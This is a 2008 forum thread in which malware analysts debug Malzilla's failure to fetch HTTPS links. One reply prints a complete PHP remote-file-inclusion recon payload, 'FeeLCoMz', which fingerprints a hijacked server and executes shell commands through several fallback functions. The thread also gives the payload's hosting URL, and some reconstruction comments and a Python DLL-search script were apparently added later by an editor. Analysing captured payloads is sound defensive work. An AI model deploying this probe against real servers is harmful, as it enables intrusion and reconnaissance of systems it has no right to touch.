Author Topic: MalZilla  (Read 304269 times)


October 24, 2008, 07:19:36 pm
Reply #225

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hmmm... you just found another bug. It did work.... :(

October 25, 2008, 01:01:58 pm
Reply #226

Orac

  • Special Members
  • Hero Member

  • Offline
  • *

  • 723
    • malwareremoval.com
httpS bug

Using Malzilla I attempted to retrieve https://www.ba-sat.com/sunshop/images/products/idfeel.txt and it gave me a 500 response, but I was able to grab the link using other means.

Code:
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();

Of course, why anyone would use an https link for an RFI is another question  ::)
Malware analysed using Clarified Analyzer to record and document how malware behaves in a networking environment

October 25, 2008, 01:10:17 pm
Reply #227

sowhat-x

  • Guest
...worked fine for me at the very exact moment? Using v1.1.0 obviously...

Code:
<?php
//FeeLCoMz Response
// Recon probe served from the RFI target, reassembled from the forum's
// syntax-highlighter output: the '=' operators, the '<' in ConvertBytes and the
// commas in sprintf() were eaten by the extraction and are restored here; the
// thresholds 4 and 7 are inferred from the adjacent branches (<4 / <=6 / <=9).
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR); // as posted: $SERVER_ADDR is undefined unless register_globals is on
$free1 = @diskfreespace($pwd1);
$all1 = @disk_total_space($pwd1);
$used = ConvertBytes($all1-$free1);
$free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}

// Fingerprint of the compromised host, echoed back to whoever included the file
echo "FeeLCoMz".$sf."<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";

// Human-readable size based on the digit count of the number
function ConvertBytes($number) {
  $len = strlen($number);
  if($len < 4) { return sprintf("%d b", $number); }
  if($len >= 4 && $len <= 6) { return sprintf("%0.2f Kb", $number/1024); }
  if($len >= 7 && $len <= 9) { return sprintf("%0.2f Mb", $number/1024/1024); }
  return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

// Tries each command-execution primitive in turn until one is not disabled
function ex($cfe) {
  $res = '';
  if (!empty($cfe)) {
    if(function_exists('exec')) {
      @exec($cfe,$res);
      $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
      $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
      @ob_start();
      @system($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(function_exists('passthru')) {
      @ob_start();
      @passthru($cfe);
      $res = @ob_get_contents();
      @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
      $res = "";
      while(!@feof($f)) { $res .= @fread($f,1024); }
      @pclose($f);
    } else { $res = "NULL"; }
  }
  return $res;
}

exit;

?>

PS: That's what happens to people that prefer using Vista instead of XP... ;-)

October 25, 2008, 02:03:50 pm
Reply #228

Orac

Since reading Sow's post, I've reinstalled v1.1.0 and it still gives me a 500 response on that link, strange.

October 25, 2008, 02:41:23 pm
Reply #229

bobby

Works fine here. Either geolocation or you are banned from the server (or your proxy is banned if you are using one).

October 25, 2008, 02:58:07 pm
Reply #230

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
https://www.ba-sat.com/sunshop/images/products/idfeel.txt

Quote
GET /sunshop/images/products/idfeel.txt HTTP/1.0
Host: www.ba-sat.com:443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept-Encoding: gzip

Works fine in my browser.

October 25, 2008, 06:18:00 pm
Reply #231

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I get the best results when downloading from Ireland mirror (can't recall the name).

Tis HEANet ;)

@John,
I get the same error for that one, and it works fine in the browser and in vURL DE;
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

October 25, 2008, 06:48:29 pm
Reply #232

sowhat-x

I was talking with Orac about it earlier on IRC...we didn't manage to come up with a solution.
It's not DNS cache (ipconfig /flushdns), that's for sure.
It's not firewall rules, again, that's for sure.
Then again, the error code returned is 500...which is kinda weird:
because if we assume the fault is not in the server configuration itself,
then the only thing that comes to mind is that the packets
don't get transmitted correctly from the client itself...thereby triggering that error.

bobby says "either geolocation or you are banned from the server",
which pretty much seems to be the most reasonable explanation to me.
If not, then...not many things come to mind on how to solve this, anyway...

1) Capture two different pcap files in order to compare what's going on...
one via whatever browser that responds 200 OK, one via Malzilla that returns 500.
2) Trace what Malzilla does when the annoying 500 returns, either via OllyDbg,
or even via a "simpler" API tracer out there...here's a small example list:
http://www.teamfurry.com/index.php?topic=10.msg21#msg21
3) Maybe the server itself doesn't implement SSL correctly?
Here's all the SSL algos that this server supposedly implements/understands...

October 25, 2008, 08:12:39 pm
Reply #233

Orac

Quote
"either geolocation or you are banned from the server"

Can't be either of those as I can get the link using a browser.

Pcap logs show a zero-byte TCP stream when using Malzilla; the TCP stream is completely normal when using a browser.

I tried using Malzilla with the same UA as my browser, that didn't make any difference either.

I think it's either something in the server, or the https request from Malzilla isn't being accepted for some reason.

October 25, 2008, 08:37:10 pm
Reply #234

bobby

I've found some reports that the OpenSSL library is not working properly on WinXP SP3, so this bug may affect Vista too.
Malzilla uses the OpenSSL library to handle the HTTPS protocol (libeay32.dll in Malzilla's folder).
The version supplied with Malzilla is 0.9.8.7 (0.9.8g).
If you find a newer version, please replace the old dll.
You may try to get the files from here (extract them from the installer):
http://www.slproweb.com/products/Win32OpenSSL.html

October 25, 2008, 11:21:13 pm
Reply #235

sowhat-x
Quote
Pcap logs show a zero byte TCP stream when using malzilla
...if Wireshark doesn't report much stuff regarding the SSL handshake/algo negotiation in question,
there are a couple of alternatives I can think of...or actually,
it's one alternative option, that is to use an SSL 'debugging' proxy instead...
with ssldump as the first one that comes to mind.
Note though that I've never tried to build ssldump under win32...  :-\
http://www.rtfm.com/ssldump/

What I've been in need of compiling and have used successfully under win32 in the past
is a couple of simpler SSL diagnostic proxy implementations...Mozilla's own ssltap namely:
http://www.mozilla.org/projects/security/pki/nss/tools/ssltap.html
And sshole as well (it had built cleanly under cygwin)...
http://thekonst.net/en/sshole

October 26, 2008, 03:27:42 pm
Reply #236

Orac

Found the answer from bobby's link
Quote
If you discover 0.9.8i doesn't work (saying something like "The application did not start") and you are running XP SP3 and have installed the VC++ 2008 Redistributables, then revert to XP SP2 and make it a corporate policy to stop using the latest bleeding-edge software from Microsoft.

Guess what, this machine is XP SP3

:(

October 29, 2008, 10:48:17 pm
Reply #237

MysteryFCM
Just an FYI Bobby, Malzilla is showing the following on initial launch? (loaded without issue after clicking OK)
Regards


October 29, 2008, 11:44:17 pm
Reply #238

bobby
That's the part of OpenSSL. Malzilla uses this dll to handle https links.
Do you have another libeay32.dll in your path or just the one dll in Malzilla's folder?
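bobby's question is about DLL search order: if a second libeay32.dll sits somewhere the loader looks before or after Malzilla's own folder, a different OpenSSL build can end up handling HTTPS. The script below is an added example, not part of Malzilla; it builds the directory list in the order the Windows loader consults it with SafeDllSearchMode enabled (application directory, System32, the 16-bit system directory, the Windows directory, the current directory, then PATH) and reports every copy of a DLL along that order, marking the one that would be loaded and the ones it shadows. It does not model KnownDLLs, manifests or SetDllDirectory. The directories are passed in explicitly so the demo_layout helper can exercise it with a constructed temp-directory layout on any OS.

```python
"""Report every copy of a DLL along the loader search path (added example).

Directory arguments are caller-supplied; demo_layout() builds a constructed
layout under a temporary directory so the script runs stand-alone anywhere.
"""
import os
import tempfile


def loader_search_order(app_dir, system_dirs, cwd, path_env):
    """Directories in SafeDllSearchMode order, duplicates removed (first wins)."""
    dirs = [app_dir] + list(system_dirs) + [cwd]
    dirs += [d for d in path_env.split(os.pathsep) if d]
    seen, ordered = set(), []
    for d in dirs:
        key = os.path.normcase(os.path.abspath(d))
        if key not in seen:
            seen.add(key)
            ordered.append(d)
    return ordered


def find_dll_copies(dll_name, search_dirs):
    """Full paths of every file named dll_name, in search order."""
    return [os.path.join(d, dll_name) for d in search_dirs
            if os.path.isfile(os.path.join(d, dll_name))]


def shadowing_report(dll_name, search_dirs):
    """Which copy the loader picks, and which copies are shadowed by it."""
    copies = find_dll_copies(dll_name, search_dirs)
    if not copies:
        return {"loaded": None, "shadowed": []}
    return {"loaded": copies[0], "shadowed": copies[1:]}


def demo_layout():
    """Constructed layout: a copy in the tool's folder and a second copy on PATH."""
    root = tempfile.mkdtemp(prefix="dllsearch-")
    app = os.path.join(root, "Malzilla")        # application directory
    sysd = os.path.join(root, "System32")       # stands in for the system directory
    other = os.path.join(root, "OtherTool")     # some other tool's folder on PATH
    for d in (app, sysd, other):
        os.makedirs(d)
    for d in (app, other):
        with open(os.path.join(d, "libeay32.dll"), "wb") as fh:
            fh.write(b"constructed placeholder, not a real DLL")
    # PATH lists the other tool first, but the application directory still wins.
    order = loader_search_order(app, [sysd], root, os.pathsep.join([other, app]))
    return order, shadowing_report("libeay32.dll", order)


if __name__ == "__main__":
    order, report = demo_layout()
    print("search order:", order)
    print("loaded:", report["loaded"])
    print("shadowed:", report["shadowed"])
```

For a real check on Windows, call loader_search_order with the tool's folder, the results of os.environ["SystemRoot"] joined with "System32", "System" and "", os.getcwd() and os.environ["PATH"]; a non-empty "shadowed" list is the situation bobby is asking about, and a "loaded" path outside the tool's folder would mean the tool's bundled OpenSSL is not the one in use.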

October 29, 2008, 11:45:34 pm
Reply #239

MysteryFCM
Just the one of them :)
Regards
